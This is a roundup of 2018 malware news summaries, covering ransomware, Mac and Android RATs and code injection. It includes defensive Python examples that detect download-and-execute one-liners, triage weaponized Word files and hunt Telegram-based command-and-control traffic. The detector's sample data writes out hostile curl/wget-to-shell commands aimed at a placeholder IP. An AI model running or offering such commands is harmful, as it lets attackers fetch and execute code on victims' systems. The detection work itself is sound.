
Malware Manifesto


Rakhni.png

 

5th July, 2018 By Mohit Kumar The Hacker News

 

Summary: Security researchers have discovered an interesting piece of malware that infects systems with either a cryptocurrency miner or ransomware, depending on the victim's configuration, to decide which of the two schemes could be more profitable.

 

While ransomware is a type of malware that locks your computer and prevents you from accessing the encrypted data until you pay a ransom to get the decryption key required to decrypt your files, cryptocurrency miners utilize an infected system's CPU power to mine digital currencies.

 



Nozelesn.png

 

2nd July, 2018 By Lawrence Abrams Bleeping Computer

 

Summary: A distribution campaign for a new ransomware called Nozelesn, targeting Poland, is currently underway. The campaign started July 2nd; we already have reports from victims in our forums, and numerous cases have been spotted on ID Ransomware.

 

MalwareHunterTeam noticed numerous submissions to ID Ransomware this morning from Poland and a new topic created by victims in the BleepingComputer forums. A researcher at CERT Polska, the Computer Emergency Response Team for Poland, has also stated that they believe the ransomware is being distributed through a spam campaign pretending to be a DHL invoice.

 



OSX.Dummy.png

 

June 30, 2018  By Pierluigi Paganini Security Affairs

Summary: The former NSA white-hat hacker and malware researcher Patrick Wardle analyzed a new Mac malware dubbed OSX.Dummy that targets the cryptocurrency community.

 
The popular expert decided to analyze the malicious code after security researcher Remco Verhoef (@remco_verhoef) posted an interesting entry to the SANS ‘InfoSec Handlers Diary Blog’ titled “Crypto community target of MacOS malware.”
 

“Previous days we’ve seen multiple MacOS malware attacks, originating within crypto-related Slack or Discord chat groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary,” wrote Verhoef.
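The lure Verhoef describes is a chat message that asks the victim to paste a one-liner which fetches a binary and runs it. As an added example, not code from the SANS diary or from Wardle's analysis, the Python below classifies a pasted shell one-liner as download-and-execute when a curl/wget stage is piped into an interpreter, when a file it wrote is later made executable and run, or when remote content is expanded through command substitution. The sample snippets are constructed for this example and are not the campaign's real commands; the operator grammar and the downloader/interpreter lists are assumptions.

```python
import os
import re
import shlex

DOWNLOADERS = {"curl", "wget", "fetch"}
INTERPRETERS = {"sh", "bash", "zsh", "ksh", "dash", "python", "python3",
                "perl", "ruby", "osascript"}
# Shell operators we split on. Quoted operators are not honoured (assumption:
# a real deployment would use a proper shell parser instead of a regex).
SPLIT_RE = re.compile(r"\s*(\|\||&&|\||;)\s*")
# $(curl ...) / <(wget ...): remote content expanded straight into a command.
SUBST_RE = re.compile(r"[$<]\(\s*(?:curl|wget)\b")

# Constructed snippets for this example (not the campaign's real commands);
# the addresses are documentation ranges / reserved names.
SAMPLE_SNIPPETS = {
    "cd /tmp && curl -s http://198.51.100.10/x > script && chmod +x script && ./script": True,
    "curl -fsSL https://198.51.100.10/install.sh | bash": True,
    'bash -c "$(wget -qO- http://198.51.100.10/p)"': True,
    "brew install jq && jq . config.json": False,
    "curl -O https://example.invalid/whitepaper.pdf": False,
}


def _segments(snippet):
    """Split a one-liner into (operator_before, command) pairs."""
    parts = SPLIT_RE.split(snippet.strip())
    segs, op = [], ""
    for i, part in enumerate(parts):
        if i % 2:          # odd positions hold the captured operator
            op = part
        elif part:
            segs.append((op, part))
    return segs


def _argv(command):
    try:
        return shlex.split(command)
    except ValueError:     # unbalanced quotes: fall back to whitespace split
        return command.split()


def classify_snippet(snippet):
    """Return the reasons a snippet looks like download-and-execute (empty if none)."""
    reasons = []
    segs = [(op, _argv(cmd)) for op, cmd in _segments(snippet)]
    written = set()        # basenames of files a downloader stage wrote to disk
    for i, (_op, argv) in enumerate(segs):
        if not argv:
            continue
        cmd = os.path.basename(argv[0])
        if cmd in DOWNLOADERS:
            nxt = segs[i + 1] if i + 1 < len(segs) else None
            if nxt and nxt[0] == "|" and nxt[1] and os.path.basename(nxt[1][0]) in INTERPRETERS:
                reasons.append("remote content piped into " + nxt[1][0])
            for j, tok in enumerate(argv[1:], 1):
                # curl -o FILE, wget -O FILE, or a shell redirection to FILE
                if tok in ("-o", "--output", ">", ">>") or (cmd == "wget" and tok == "-O"):
                    if j + 1 < len(argv):
                        written.add(os.path.basename(argv[j + 1]))
                elif tok.startswith(">"):
                    written.add(os.path.basename(tok.lstrip(">")))
        elif cmd == "chmod" and len(argv) >= 3 and os.path.basename(argv[-1]) in written:
            reasons.append("downloaded file made executable: " + argv[-1])
        elif cmd in written:
            reasons.append("downloaded file executed: " + argv[0])
        elif cmd in INTERPRETERS and any(os.path.basename(a) in written for a in argv[1:]):
            reasons.append("downloaded file run by " + cmd)
    if SUBST_RE.search(snippet):
        reasons.append("remote content expanded by command substitution")
    return reasons


def is_download_and_execute(snippet):
    return bool(classify_snippet(snippet))


if __name__ == "__main__":
    for snippet, expected in SAMPLE_SNIPPETS.items():
        print("%-5s expected %-5s  %s" % (is_download_and_execute(snippet), expected, snippet))
```

A plain `curl -O` of a document is deliberately not flagged: the signal is the second stage (an interpreter, `chmod +x`, or execution of the file just written), not the download itself. The check is meant for a chat moderation bot or an endpoint agent that sees the pasted command; it says nothing about what the fetched binary does.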

 

 


PROPagate.png

 

 

29th June, 2018 By Catalin Cimpanu Bleeping Computer

 

Security firm FireEye has detected that malware authors have deployed the PROPagate code injection technique for the first time inside a live malware distribution campaign.

 

PROPagate is a relatively new code injection technique, discovered in November 2017.

Back then, a security researcher found that an attacker could abuse the SetWindowSubclass API, a Windows function used to subclass GUI windows, to load and execute malicious code inside the processes of legitimate apps.

 

 


GZipDe.png

 

June 22, 2018  By Pierluigi Paganini 

 

Summary: GZipDe is a downloader that threat actors use to fetch other payloads from an attacker-controlled server. The malware was detected after a user from Afghanistan uploaded a weaponized Word document to the VirusTotal service; the document refers to the Shanghai Cooperation Organization Summit.

 

At the time, it is not possible to attribute the malicious code to a specific actor: VirusTotal doesn't share information about the source of the upload, the target of the attack was not disclosed, and the researchers were only able to analyze the sample.
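With nothing but the uploaded document to work from, analysis starts with a static first pass over the file itself. The Python below is an added example, not the researchers' or the article's code, and it does not claim to reproduce GZipDe's delivery mechanism, which the summary does not describe: it opens an OOXML (docx/docm) package from bytes and reports the usual weaponization markers, namely an embedded VBA project, external attachedTemplate/oleObject relationships, and embedded OLE objects. The three sample documents are constructed in memory and the URLs in them are placeholders; treating hyperlinks as benign while flagging template and OLE links is an assumption of this example.

```python
import io
import re
import zipfile

VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
# Self-closing <Relationship .../> entries from the package's .rels parts.
REL_RE = re.compile(r"<Relationship\b[^>]*/>", re.I)
ATTR_RE = re.compile(r'(\w+)="([^"]*)"')
# External hyperlinks are common in benign files; remote templates and OLE
# links are the relationship types worth flagging (assumption).
RISKY_REL_TYPES = ("/attachedTemplate", "/oleObject")


def triage_office_doc(data):
    """Static first-pass triage of an OOXML document given as bytes."""
    findings = {"macros": False, "external_targets": [], "embedded_objects": []}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        findings["error"] = "not an OOXML (zip) container"
        findings["suspicious"] = False
        return findings
    with zf:
        names = zf.namelist()
        # Macro-enabled documents carry a VBA project part and declare its content type.
        if any(n.lower().endswith("vbaproject.bin") for n in names):
            findings["macros"] = True
        if "[Content_Types].xml" in names and \
                VBA_CONTENT_TYPE in zf.read("[Content_Types].xml").decode("utf-8", "replace"):
            findings["macros"] = True
        for n in names:
            if "/embeddings/" in n:
                findings["embedded_objects"].append(n)
            if not n.endswith(".rels"):
                continue
            xml = zf.read(n).decode("utf-8", "replace")
            for rel in REL_RE.findall(xml):
                attrs = dict(ATTR_RE.findall(rel))
                if attrs.get("TargetMode") == "External" and \
                        attrs.get("Type", "").endswith(RISKY_REL_TYPES):
                    findings["external_targets"].append((n, attrs.get("Target", "")))
    findings["suspicious"] = bool(findings["macros"] or findings["external_targets"]
                                  or findings["embedded_objects"])
    return findings


def _build_doc(parts):
    """Assemble a minimal OOXML package in memory (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in parts.items():
            zf.writestr(name, content)
    return buf.getvalue()


NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Constructed samples: a plain document with a hyperlink, a macro-enabled one,
# and one that pulls a remote template (placeholder address).
BENIGN_DOC = _build_doc({
    "[Content_Types].xml": '<Types><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/></Types>',
    "word/document.xml": "<w:document/>",
    "word/_rels/document.xml.rels": '<Relationships><Relationship Id="rId1" Type="%shyperlink" Target="https://example.invalid/" TargetMode="External"/></Relationships>' % NS,
})
MACRO_DOC = _build_doc({
    "[Content_Types].xml": '<Types><Override PartName="/word/vbaProject.bin" ContentType="%s"/></Types>' % VBA_CONTENT_TYPE,
    "word/document.xml": "<w:document/>",
    "word/vbaProject.bin": b"\xd0\xcf\x11\xe0placeholder",
})
TEMPLATE_DOC = _build_doc({
    "[Content_Types].xml": "<Types/>",
    "word/settings.xml": "<w:settings/>",
    "word/_rels/settings.xml.rels": '<Relationships><Relationship Id="rId1" Type="%sattachedTemplate" Target="http://198.51.100.10/t.dotm" TargetMode="External"/></Relationships>' % NS,
})

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_DOC), ("macro", MACRO_DOC), ("template", TEMPLATE_DOC)):
        print(label, triage_office_doc(doc))
```

The check only says whether the file carries something that can run or reach out; it does not decode the VBA or fetch anything, which is the next step (and the step that should happen in a sandbox, not on the analyst's workstation).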

 


SamSam.png

 

27th April, 2018 By Tara Seals Threat Post

 

Summary: Ransomware has lately lost its status as the queen of the cybercrime prom, but a new iteration of the nefarious SamSam extortion code shows that it can still make a bid to be sparkly and attention-getting.

 

The latest version of SamSam has taken the malware road less traveled, ditching widespread spam campaigns for unusually targeted, whole-company attacks. According to an analysis by Sophos, in a reversal of previous tactics, SamSam operators are now launching thousands of copies of the ransomware at once into individual organizations, each of which has been carefully selected.

 


MirageFox.png

 

18th June, 2018 By Eduard Kovacs on Security Week
 

Summary: A cyber-espionage group believed to be operating out of China has developed a new piece of malware that appears to be based on one of the first tools used by the threat actor.

 

The actor is known as APT15, Ke3chang, Mirage, Vixen Panda, Royal APT and Playful Dragon, and its tools are tracked by various cybersecurity companies as Mirage, BS2005, RoyalCLI, RoyalDNS, TidePool, BMW and MyWeb. The group has been known to target organizations in the defense, high tech, energy, government, aerospace, manufacturing and other sectors.

 


Zacinlo.png

 

18th June, 2018 By Catalin Cimpanu Bleeping Computer

 

Summary: When it was released back in 2015, one of the main perks of Windows 10 was the improved security features that made it harder for rootkits to get a foothold on Microsoft's new OS.

 

But three years later, security researchers from Romania-based antivirus vendor Bitdefender say they've discovered a new adware strain named Zacinlo that uses a rootkit component to gain persistence across OS reinstalls, one that's even effective against Windows 10 installations.

 

In fact, researchers say that 90% of all Zacinlo's recent victims are Windows 10 users, showing that crooks intentionally designed their "product" to work against Microsoft's latest OS.

 


HeroRAT.png

 

19th June, 2018 By Pierluigi Paganini Security Affairs

 

Summary: Malware researchers from ESET have discovered a new strain of Android RAT, tracked as HeroRat, that leverages the Telegram protocol for command and control and data exfiltration.

 

HeroRat isn't the first malware abusing the Telegram protocol; past investigations reported similar threats such as TeleRAT and IRRAT.

 

The new RAT has been in the wild at least since August 2017 and in March 2018 its source code was released for free on Telegram hacking channels allowing various threat actors to create their own variant.
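Command and control over Telegram can be hunted on the network side, because a RAT that drives itself through the Bot API has to keep talking to the same bot endpoint. The Python below is an added example, not code from ESET or from the article: it parses constructed proxy log lines (the log format, client addresses and bot tokens are all made up for this example) and flags clients that repeatedly poll the Bot API `getUpdates` method or push data with the `send*` methods. The URL shape `https://api.telegram.org/bot<token>/<method>` is Telegram's documented Bot API; the polling and exfiltration thresholds are assumptions of this example, not a description of HeroRat's exact traffic.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Bot API calls have the shape https://api.telegram.org/bot<token>/<method>,
# where <token> is "<numeric bot id>:<secret>" (the secret is typically 35
# characters; the length floor below is a deliberately loose assumption).
TELEGRAM_BOT_RE = re.compile(r"^/bot(\d+:[A-Za-z0-9_-]{30,})/([A-Za-z]+)")

# Heuristic (assumption for this example): repeated getUpdates polling is how
# a bot-API RAT receives commands; the send* methods are how it pushes data out.
EXFIL_METHODS = {"sendDocument", "sendPhoto", "sendVideo", "sendAudio", "sendMessage"}

# Constructed proxy log lines for this example: timestamp, client IP,
# quoted user agent, HTTP method, URL. Client addresses and tokens are made up.
SAMPLE_LOG = """\
2018-06-19T10:00:01 10.0.0.5 "okhttp/3.10.0" GET https://api.telegram.org/bot123456789:AAFwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01/getUpdates?offset=1
2018-06-19T10:00:03 10.0.0.5 "okhttp/3.10.0" GET https://api.telegram.org/bot123456789:AAFwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01/getUpdates?offset=1
2018-06-19T10:00:31 10.0.0.5 "okhttp/3.10.0" POST https://api.telegram.org/bot123456789:AAFwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01/sendDocument
2018-06-19T10:01:07 10.0.0.9 "Telegram-Android/4.8.5" POST https://149.154.167.50:443/api
2018-06-19T10:02:00 10.0.0.7 "Mozilla/5.0" GET https://api.telegram.org/bot987654321:BBGwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ98/sendMessage?chat_id=1&text=hi
"""

LOG_RE = re.compile(r'^(\S+) (\S+) "([^"]*)" (\S+) (\S+)$')


def telegram_bot_call(url):
    """Return (token, method) when url is a Telegram Bot API call, else None."""
    parts = urlsplit(url)
    if parts.hostname != "api.telegram.org":
        return None
    m = TELEGRAM_BOT_RE.match(parts.path)
    return (m.group(1), m.group(2)) if m else None


def find_telegram_c2(log_text, min_polls=2):
    """Group Bot API calls per (client, token) and flag C2-like clients.

    A client is reported when it polls getUpdates at least min_polls times
    or calls any exfiltration method; severity is "high" when both are seen.
    """
    calls = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed log format
        ts, client, user_agent, _verb, url = m.groups()
        hit = telegram_bot_call(url)
        if hit:
            token, method = hit
            calls[(client, token)].append((ts, user_agent, method))

    findings = []
    for (client, token), events in calls.items():
        methods = [method for _, _, method in events]
        polls = methods.count("getUpdates")
        exfil = sorted({method for method in methods if method in EXFIL_METHODS})
        if polls >= min_polls or exfil:
            findings.append({
                "client": client,
                "bot_id": token.split(":")[0],   # report the id, never the secret
                "polls": polls,
                "exfil_methods": exfil,
                "user_agents": sorted({ua for _, ua, _ in events}),
                "first_seen": min(ts for ts, _, _ in events),
                "severity": "high" if polls >= min_polls and exfil else "medium",
            })
    return sorted(findings, key=lambda f: f["client"])


if __name__ == "__main__":
    for finding in find_telegram_c2(SAMPLE_LOG):
        print(finding)
```

Official Telegram clients speak MTProto to Telegram's data centres rather than the HTTPS Bot API, so the line from 10.0.0.9 models ordinary messenger traffic and is ignored; Bot API traffic from an endpoint that is not a known bot host is itself worth a look. A single `sendMessage` from a developer's machine will produce a medium finding, which is why the token's bot id is reported: it lets an analyst group and allow-list legitimate bots without ever logging the secret.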

 

 


OlympicDestroyer.png

 

19th June, 2018 By Catalin Cimpanu Bleeping Computer

 

Summary: Olympic Destroyer, the malware that hit the Pyeongchang 2018 Winter Olympics, is still alive and infecting new victims, according to a report published earlier today by Russian antivirus vendor Kaspersky Lab. The company's security researchers say they've detected Olympic Destroyer infections across Europe in May and June 2018. New victims include financial organizations in Russia, and biological and chemical threat prevention laboratories in Europe and Ukraine.

 
